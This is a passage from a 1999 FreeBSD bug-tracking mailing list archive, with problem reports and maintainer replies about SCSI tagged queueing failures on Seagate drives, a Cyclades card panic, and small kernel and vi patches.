transfers (10.0MHz, offset 15), Tagged Queueing Enabled ... da2: 10.0MB/s transfers (10.0MHz, offset 15) In conjunction with another problem which I am filing separately (the possibility that the Seagate ST32550WC is broken with respect to tagged queueing) this causes my system to sometimes work and sometimes fail depending on the level of disk activity. I did not notice this earlier because until recently I have not significantly stressed the disk I/O. Now that it's a problem I've reviewed the system logs for the past few months and found that sometimes tagged queueing was enabled and sometimes not. FWIW the version of cam_xpt.c in my source tree is 1.42. There are a few too many things involved in the enable/disable code for me to be certain what is going on or whether the flags are even being initialized properly. I looked at the CVS log for this file but could not be sure whether the problem had been noticed or addressed in later revs. Ditto GNATS. It seems unlikely that a problem like this could have escaped notice until now, so this bug report is more of a preliminary check to find out whether it's worth sending additional info. >How-To-Repeat: Unknown, but I can reproduce the variability quite reliably and am willing to test some number of changes to 3.1-RELEASE, as well as send additional info like system log output for the last few months (too long for this form). >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 18:50: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 37AF214D2D for ; Sun, 12 Dec 1999 18:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA67130; Sun, 12 Dec 1999 18:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 7522114D48; Sun, 12 Dec 1999 18:40:28 -0800 (PST) Message-Id: <19991213024028.7522114D48@hub.freebsd.org> Date: Sun, 12 Dec 1999 18:40:28 -0800 (PST) From: klh@netcom.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/15447: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15447 >Category: kern >Synopsis: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 18:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ken Harrenstien >Release: 3.1-RELEASE >Organization: >Environment: FreeBSD 3.1-RELEASE FreeBSD 3.1-RELEASE #: i386 >Description: A separate problem is causing my system to sometimes boot up with tagged queueing enabled and sometimes not. I've recently been stressing the disk significantly more than usual and have encountered user-level I/O errors that I traced back to the enabling of tagged queueing. With tagged queueing off, everything always works. With it on, a heavy load of seeks will cause reads and writes to start failing. I was able to verify this by running a test case on two ST32550s, both on line during the same kernel boot and both identical in all respects except that one had tagged queueing enabled and the other didn't (the randomness of this enabling is a separate problem). The drive without tagging always works perfectly; the drive with tagging always fails at random places during the test. I verified that it is not specific to the individual drives by doing reboots until the formerly tag-enabled drive booted up tag-disabled -- whereupon it then performed perfectly again. I also verified that the filesystems were identical by doing a complete track-by-track copy of one to the other prior to testing. The ST32550 is not in the latest quirks table in cam_xtp.c, although several other Seagates are. The Barracuda 2LP was at one time fairly popular so I'm a little surprised this hasn't shown up before, but who knows. Maybe most FreeBSD users have IDE drives. >How-To-Repeat: My test case consisted of saving a tar of /usr/src/sys in a partition about 1G distance away from /usr on the same drive, and attempting to restore to /usr from that. Tar encounters I/O errors attempting to restore perhaps 1% to 2% of the files. Once in a while the kernel will get a swap error and complain, but otherwise no diagnostics are shown on the console. >Fix: Obviously the ST32550 can be added to the quirks table in cam_xtp.c. I just hope this does not reflect some underlying problem with tagged queueing support of Seagates in general. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 19: 0: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DBF3014CA3 for ; Sun, 12 Dec 1999 19:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA67925; Sun, 12 Dec 1999 19:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 4ED6114D2D; Sun, 12 Dec 1999 18:52:28 -0800 (PST) Message-Id: <19991213025228.4ED6114D2D@hub.freebsd.org> Date: Sun, 12 Dec 1999 18:52:28 -0800 (PST) From: klh@netcom.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/15448: Would be nice if the kernel could detect/report problems with SCSI tagged queueing Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15448 >Category: kern >Synopsis: Would be nice if the kernel could detect/report problems with SCSI tagged queueing >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 19:00:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ken Harrenstien >Release: 3.1-RELEASE >Organization: >Environment: FreeBSD 3.1-RELEASE FreeBSD 3.1-RELEASE #: i386 >Description: I just spent a nerve-wracking day backing up some drives that I thought were about to crash their little heads, only to finally discover that the problem was a failure of SCSI command tagged queueing to work properly. I was very surprised that even though I was getting user program I/O errors (from tar), the kernel gave me no feedback at all on the console. This was really mystifying. I don't know enough about how tagging works to know whether it's even feasible to detect when it's not working -- but the kernel is clearly getting SOME kind of error that it's relaying back to the user. Would it be possible to make sure that I/O errors of this nature send *something* to the console log? (Actually, that's a good idea for any sort of I/O error; I know most of them are reported OK). This would be a huge help tracking down potentially buggy drives; the effort to zero in on this possibility is otherwise very time-consuming. Thanks... >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 20:20: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 968A314D95 for ; Sun, 12 Dec 1999 20:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA74131; Sun, 12 Dec 1999 20:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id BB13C14EBC; Sun, 12 Dec 1999 20:18:49 -0800 (PST) Message-Id: <19991213041849.BB13C14EBC@hub.freebsd.org> Date: Sun, 12 Dec 1999 20:18:49 -0800 (PST) From: jjr@alisa.org To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15451: FreeBSD 3.2 system panics with Cyclades 8yep card installed & driver enabled Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15451 >Category: i386 >Synopsis: FreeBSD 3.2 system panics with Cyclades 8yep card installed & driver enabled >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 20:20:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: John Rushford >Release: FreeBSD 3.2 >Organization: FreeBSD user >Environment: FreeBSD snow.alisa.org 3.2-RELEASE FreeBSD 3.2-REL i386 i386 >Description: Installed Cyclades 8YeP PCI multiports card and enabled the cy driver in the kernel: device cy0 The system panics and crashes with this card installed. >How-To-Repeat: Install a Cyclades 8YEP PCI multiports card and enable the driver. Uncomment the appropriate line in rc.serial and execute the script. The system immediately panics. >Fix: Fix unknown. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 20:20: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DCB5E14D7C for ; Sun, 12 Dec 1999 20:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA74122; Sun, 12 Dec 1999 20:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from tinker.exit.com (exit-gw.power.net [207.151.46.196]) by hub.freebsd.org (Postfix) with ESMTP id 7637F14DA5; Sun, 12 Dec 1999 20:13:06 -0800 (PST) (envelope-from frank@exit.com) Received: from realtime.exit.com (realtime.exit.com [206.223.0.5]) by tinker.exit.com (8.9.3/8.9.3) with ESMTP id UAA01172; Sun, 12 Dec 1999 20:13:01 -0800 (PST) (envelope-from frank@exit.com) Received: (from frank@localhost) by realtime.exit.com (8.9.3/8.9.3) id UAA06415; Sun, 12 Dec 1999 20:13:01 -0800 (PST) (envelope-from frank) Message-Id: <199912130413.UAA06415@realtime.exit.com> Date: Sun, 12 Dec 1999 20:13:01 -0800 (PST) From: frank@exit.com Reply-To: frank@exit.com To: FreeBSD-gnats-submit@freebsd.org Cc: hackers@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15450: vi screws up relative tag paths (with patch). Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15450 >Category: bin >Synopsis: The name of the tagfile is left in the path. >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 20:20:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Frank Mayhar >Release: FreeBSD 3.4-RC i386 >Organization: Subversive Atheists -R- Us >Environment: 3.4-RC, 4.0-current, etc. >Description: The routine ctag_file(), when constructing the path to the file from a relative path in the tagfile, leaves the name of the tagfile in the path. >How-To-Repeat: Create a tagfile with relative entries, go to a different directory, and do a "vi -t ". >Fix: Index: ex_tag.c =================================================================== RCS file: /cvs/repos/src/contrib/nvi/ex/ex_tag.c,v retrieving revision 1.2 diff -c -r1.2 ex_tag.c *** ex_tag.c 1997/04/18 23:36:43 1.2 --- ex_tag.c 1999/06/25 20:59:29 *************** *** 1339,1349 **** stat(name, &sb) && (p = strrchr(tfp->name, '/')) != NULL) { *p = '\0'; len = snprintf(buf, sizeof(buf), "%s/%s", tfp->name, name); - *p = '/'; if (stat(buf, &sb) == 0) { *dirp = tfp->name; *dlenp = strlen(*dirp); } } } --- 1339,1349 ---- stat(name, &sb) && (p = strrchr(tfp->name, '/')) != NULL) { *p = '\0'; len = snprintf(buf, sizeof(buf), "%s/%s", tfp->name, name); if (stat(buf, &sb) == 0) { *dirp = tfp->name; *dlenp = strlen(*dirp); } + *p = '/'; } } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 20:26: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 470FC14C1B; Sun, 12 Dec 1999 20:26:00 -0800 (PST) (envelope-from dillon@FreeBSD.org) Received: (from dillon@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA74766; Sun, 12 Dec 1999 20:26:00 -0800 (PST) (envelope-from dillon@FreeBSD.org) Date: Sun, 12 Dec 1999 20:26:00 -0800 (PST) From: Message-Id: <199912130426.UAA74766@freefall.freebsd.org> To: iedowse@maths.tcd.ie, dillon@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15055: Soft NFS mounts can deadlock Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Soft NFS mounts can deadlock State-Changed-From-To: open->closed State-Changed-By: dillon State-Changed-When: Sun Dec 12 20:25:41 PST 1999 State-Changed-Why: Patch committed to -current and am expecting permission to MFC to -stable. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 20:30: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B40E714C1B for ; Sun, 12 Dec 1999 20:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA75208; Sun, 12 Dec 1999 20:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 12 Dec 1999 20:30:02 -0800 (PST) Message-Id: <199912130430.UAA75208@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Kenneth D. Merry" Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing Reply-To: "Kenneth D. Merry" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15446; it has been noted by GNATS. From: "Kenneth D. Merry" To: klh@netcom.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15446: Unpredictable enabling of SCSI Tagged Queueing Date: Sun, 12 Dec 1999 21:23:16 -0700 On Sun, Dec 12, 1999 at 06:18:55PM -0800, klh@netcom.com wrote: > > >Number: 15446 > >Category: kern > >Synopsis: Unpredictable enabling of SCSI Tagged Queueing [ ... ] > FreeBSD 3.1-RELEASE FreeBSD 3.1-RELEASE #: i386 > >Description: > Whether or not a device capable of tagged queueing is actually flagged > as such appears to be semi-random. It can be different for two identical > drives, and can change from one boot to the next of the same kernel. > > For example, on one recent boot, two identical drives give this: > da0: 10.0MB/s transfers (10.0MHz, offset 15), Tagged Queueing Enabled > ... > da2: 10.0MB/s transfers (10.0MHz, offset 15) > > In conjunction with another problem which I am filing separately (the > possibility that the Seagate ST32550WC is broken with respect to > tagged queueing) this causes my system to sometimes work and sometimes > fail depending on the level of disk activity. I did not notice this > earlier because until recently I have not significantly stressed the > disk I/O. Now that it's a problem I've reviewed the system logs for > the past few months and found that sometimes tagged queueing was > enabled and sometimes not. > > FWIW the version of cam_xpt.c in my source tree is 1.42. There are > a few too many things involved in the enable/disable code for me to be > certain what is going on or whether the flags are even being initialized > properly. There are several ways to enable or disable tagged queueing: - If the DQue bit in mode page 10 is set, tagged queueing will be disabled for the drive in question. If you want to view/edit mode page 10, see the camcontrol(8) man page for details. - If the drive is quirked in cam_xpt.c to have 0 tags. The only Seagate drives quirked in cam_xpt.c are the Seagate Medalist Pro drives. Seagate's web site says that the 32550 is a 2 gig Barracuda. I've never seen tagged queuing problems with Barracudas. - If tagged queueing is enabled/disabled from userland via camcontrol(8). Since this camcontrol option appeared in FreeBSD 3.2, that isn't an option in your situation. My guess is that somehow the tagged queueing bit is being enabled and disabled in the drive firmware. None of the other ways of tweaking the tagged queueing settings would explain the behavior you're seeing. Check the settings in mode page 10 with camcontrol and see whether the drive says tagged queueing is enabled or disabled. If the DQue bit is set, the drive should not be reported as a tagged queueing drive in the dmesg. If the DQue bit is set and then cleared somehow between boots on your system, that points fairly strongly to some sort of problem with the drive. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 20:30: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 733F314D95 for ; Sun, 12 Dec 1999 20:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA75213; Sun, 12 Dec 1999 20:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 12 Dec 1999 20:30:04 -0800 (PST) Message-Id: <199912130430.UAA75213@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Kenneth D. Merry" Subject: Re: kern/15447: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? Reply-To: "Kenneth D. Merry" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15447; it has been noted by GNATS. From: "Kenneth D. Merry" To: klh@netcom.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15447: Seagate ST32550 (Barracuda 2LP) may be a broken tagged queueing drive? Date: Sun, 12 Dec 1999 21:29:20 -0700 On Sun, Dec 12, 1999 at 06:40:28PM -0800, klh@netcom.com wrote: > A separate problem is causing my system to sometimes boot up with > tagged queueing enabled and sometimes not. I've recently been stressing > the disk significantly more than usual and have encountered user-level > I/O errors that I traced back to the enabling of tagged queueing. > > With tagged queueing off, everything always works. With it on, > a heavy load of seeks will cause reads and writes to start failing. > I was able to verify this by running a test case on two ST32550s, both > on line during the same kernel boot and both identical in all respects > except that one had tagged queueing enabled and the other didn't (the > randomness of this enabling is a separate problem). The drive without > tagging always works perfectly; the drive with tagging always fails > at random places during the test. I verified that it is not specific > to the individual drives by doing reboots until the formerly tag-enabled > drive booted up tag-disabled -- whereupon it then performed perfectly > again. I also verified that the filesystems were identical by doing > a complete track-by-track copy of one to the other prior to testing. > > The ST32550 is not in the latest quirks table in cam_xtp.c, although > several other Seagates are. The Barracuda 2LP was at one time fairly > popular so I'm a little surprised this hasn't shown up before, but > who knows. Maybe most FreeBSD users have IDE drives. No, there are many, many people using Seagate drives (including me) successfully in FreeBSD systems. I think this problem is most likely peculiar to your particular system and/or drives. > >Fix: > Obviously the ST32550 can be added to the quirks table in cam_xtp.c. > I just hope this does not reflect some underlying problem with > tagged queueing support of Seagates in general. Nope, it reflects a problem either with your drives or your cabling and termination setup. You need to supply some more information before we can make any sort of guess at what is going on. So, please send (and make sure you do a "group" reply to this mail, so it winds up in the PR database) full 'dmesg' output from your system, including any kernel messages that have shown up while doing your tests. Please don't send the output of /var/log/messages, unless it is necessary to show problems that happened in a previous boot. The output of dmesg(8) is easier to read. Also, please send a description of your cabling and termination setup. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 20:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3094114DE4 for ; Sun, 12 Dec 1999 20:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA76021; Sun, 12 Dec 1999 20:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 12 Dec 1999 20:40:02 -0800 (PST) Message-Id: <199912130440.UAA76021@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Kenneth D. Merry" Subject: Re: kern/15448: Would be nice if the kernel could detect/report problems with SCSI tagged queueing Reply-To: "Kenneth D. Merry" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/15448; it has been noted by GNATS. From: "Kenneth D. Merry" To: klh@netcom.com Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/15448: Would be nice if the kernel could detect/report problems with SCSI tagged queueing Date: Sun, 12 Dec 1999 21:31:52 -0700 On Sun, Dec 12, 1999 at 06:52:28PM -0800, klh@netcom.com wrote: > >Synopsis: Would be nice if the kernel could detect/report problems with SCSI tagged queueing [ ... ] > FreeBSD 3.1-RELEASE FreeBSD 3.1-RELEASE #: i386 > >Description: > I just spent a nerve-wracking day backing up some drives that I thought > were about to crash their little heads, only to finally discover that > the problem was a failure of SCSI command tagged queueing to work > properly. > > I was very surprised that even though I was getting user program I/O > errors (from tar), the kernel gave me no feedback at all on the > console. This was really mystifying. I don't know enough about how > tagging works to know whether it's even feasible to detect when it's > not working -- but the kernel is clearly getting SOME kind of error > that it's relaying back to the user. > > Would it be possible to make sure that I/O errors of this nature send > *something* to the console log? (Actually, that's a good idea for > any sort of I/O error; I know most of them are reported OK). This > would be a huge help tracking down potentially buggy drives; the effort > to zero in on this possibility is otherwise very time-consuming. I don't know why the kernel didn't print out any errors, but you'll get a lot more information if you boot with the '-v' switch. At the boot loader prompt, you can type: boot kernel -v To get the verbose boot messages. You may need to increase your message buffer size, using the MSGBUF_SIZE kernel option (see LINT for details) to avoid overflowing the kernel's message buffer. Ken -- Kenneth Merry ken@kdm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 20:50: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0FB3514ECC for ; Sun, 12 Dec 1999 20:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA76816; Sun, 12 Dec 1999 20:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mulet.e.kth.se (mulet.e.kth.se [130.237.43.20]) by hub.freebsd.org (Postfix) with ESMTP id 736F914EE7 for ; Sun, 12 Dec 1999 20:45:27 -0800 (PST) (envelope-from root@mulet.e.kth.se) Received: (from root@localhost) by mulet.e.kth.se (8.9.3/8.9.3) id FAA01587; Mon, 13 Dec 1999 05:46:19 +0100 (CET) (envelope-from root) Message-Id: <199912130446.FAA01587@mulet.e.kth.se> Date: Mon, 13 Dec 1999 05:46:19 +0100 (CET) From: assar@stacken.kth.se To: FreeBSD-gnats-submit@freebsd.org Cc: assar@stacken.kth.se, culverk@culverk.student.umd.edu X-Send-Pr-Version: 3.2 Subject: kern/15452: getfh syscall is only installed with NFS Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15452 >Category: kern >Synopsis: getfh syscall is only installed with NFS >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 20:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Assar Westerlund >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: -current >Description: The function for the getfh system call is in kern/vfs_syscalls.c and is always compiled it (and rather small), but the system call is only added to the table (`sysent') in the NFS code. This doesn't make sense, why not always have the system call? The other file handle system calls (fhopen et al) are always included but they're kind of non-useful with getfh. >How-To-Repeat: build a kernel with NFS_NOSERVER or without NFS. call getfh(). >Fix: --- kern/syscalls.master.orig Mon Nov 22 12:42:21 1999 +++ kern/syscalls.master Mon Dec 13 05:37:08 1999 @@ -248,7 +248,7 @@ 159 UNIMPL NOHIDE nosys 160 UNIMPL NOHIDE nosys ; 161 is initialized by the NFS code, if present. -161 NOIMPL BSD { int getfh(char *fname, struct fhandle *fhp); } +161 STD BSD { int getfh(char *fname, struct fhandle *fhp); } 162 STD BSD { int getdomainname(char *domainname, int len); } 163 STD BSD { int setdomainname(char *domainname, int len); } 164 STD BSD { int uname(struct utsname *name); } --- nfs/nfs_subs.c.orig Mon Dec 13 05:38:28 1999 +++ nfs/nfs_subs.c Mon Dec 13 05:39:00 1999 @@ -117,8 +117,6 @@ #ifndef NFS_NOSERVER static vop_t *nfs_prev_vop_lease_check; -static int nfs_prev_getfh_sy_narg; -static sy_call_t *nfs_prev_getfh_sy_call; /* * Mapping of old NFS Version 2 RPC numbers to generic numbers. @@ -558,8 +556,6 @@ extern struct nfsnodehashhead *nfsnodehashtbl; extern u_long nfsnodehash; -struct getfh_args; -extern int getfh(struct proc *, struct getfh_args *, int *); struct nfssvc_args; extern int nfssvc(struct proc *, struct nfssvc_args *, int *); @@ -1184,12 +1180,6 @@ sysent[SYS_nfssvc].sy_narg = 2; nfs_prev_nfssvc_sy_call = sysent[SYS_nfssvc].sy_call; sysent[SYS_nfssvc].sy_call = (sy_call_t *)nfssvc; -#ifndef NFS_NOSERVER - nfs_prev_getfh_sy_narg = sysent[SYS_getfh].sy_narg; - sysent[SYS_getfh].sy_narg = 2; - nfs_prev_getfh_sy_call = sysent[SYS_getfh].sy_call; - sysent[SYS_getfh].sy_call = (sy_call_t *)getfh; -#endif nfs_pbuf_freecnt = nswbuf / 2 + 1; @@ -1209,10 +1199,6 @@ lease_updatetime = nfs_prev_lease_updatetime; sysent[SYS_nfssvc].sy_narg = nfs_prev_nfssvc_sy_narg; sysent[SYS_nfssvc].sy_call = nfs_prev_nfssvc_sy_call; -#ifndef NFS_NOSERVER - sysent[SYS_getfh].sy_narg = nfs_prev_getfh_sy_narg; - sysent[SYS_getfh].sy_call = nfs_prev_getfh_sy_call; -#endif return (0); } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 21:41:51 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4743814C91; Sun, 12 Dec 1999 21:41:50 -0800 (PST) (envelope-from dillon@FreeBSD.org) Received: (from dillon@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id VAA80383; Sun, 12 Dec 1999 21:41:50 -0800 (PST) (envelope-from dillon@FreeBSD.org) Date: Sun, 12 Dec 1999 21:41:50 -0800 (PST) From: Message-Id: <199912130541.VAA80383@freefall.freebsd.org> To: toasty@dragondata.com, dillon@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/8834: NFS can corrupt local file cache Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: NFS can corrupt local file cache State-Changed-From-To: open->closed State-Changed-By: dillon State-Changed-When: Sun Dec 12 21:40:57 PST 1999 State-Changed-Why: The problem is believed to be fixed in 3.x and 4.x kernels, and possibly in 2.2.8 as well. A huge number of potential filesystem bugs were fixed in the last year. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 21:53:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from celery.dragondata.com (celery.dragondata.com [205.253.12.6]) by hub.freebsd.org (Postfix) with ESMTP id 6D04514C56; Sun, 12 Dec 1999 21:53:36 -0800 (PST) (envelope-from toasty@celery.dragondata.com) Received: (from toasty@localhost) by celery.dragondata.com (8.9.3/8.9.3) id XAA97399; Sun, 12 Dec 1999 23:56:21 -0600 (CST) (envelope-from toasty) From: Kevin Day Message-Id: <199912130556.XAA97399@celery.dragondata.com> Subject: Re: kern/8834: NFS can corrupt local file cache To: dillon@FreeBSD.org Date: Sun, 12 Dec 1999 23:56:21 -0600 (CST) Cc: toasty@dragondata.com, freebsd-bugs@FreeBSD.org In-Reply-To: <199912130541.VAA80383@freefall.freebsd.org> from "dillon@FreeBSD.org" at Dec 12, 1999 09:41:50 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Synopsis: NFS can corrupt local file cache > > State-Changed-From-To: open->closed > State-Changed-By: dillon > State-Changed-When: Sun Dec 12 21:40:57 PST 1999 > State-Changed-Why: > The problem is believed to be fixed in 3.x and 4.x kernels, and possibly > in 2.2.8 as well. A huge number of potential filesystem bugs were > fixed in the last year. > For the record, the problem still exists in 2.2.8, but not in 3.x or 4.x. The problem also mentioned of weirdness occuring if an executable that is executed across NFS exceeding the CPU limit still exists in at least 3.3 Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 12 23:40: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 898CF15096 for ; Sun, 12 Dec 1999 23:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id XAA90312; Sun, 12 Dec 1999 23:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from kongur.cs.ucdavis.edu (kongur.cs.ucdavis.edu [169.237.7.192]) by hub.freebsd.org (Postfix) with ESMTP id C42EB15020 for ; Sun, 12 Dec 1999 23:37:10 -0800 (PST) (envelope-from rootk@kongur.cs.ucdavis.edu) Received: (from root@localhost) by kongur.cs.ucdavis.edu (8.9.3/8.9.3) id XAA00334; Sun, 12 Dec 1999 23:37:10 -0800 (PST) (envelope-from rootk) Message-Id: <199912130737.XAA00334@kongur.cs.ucdavis.edu> Date: Sun, 12 Dec 1999 23:37:10 -0800 (PST) From: obrien@nuxi.cs.ucdavis.edu Reply-To: obrien@freebsd.org To: FreeBSD-gnats-submit@freebsd.org 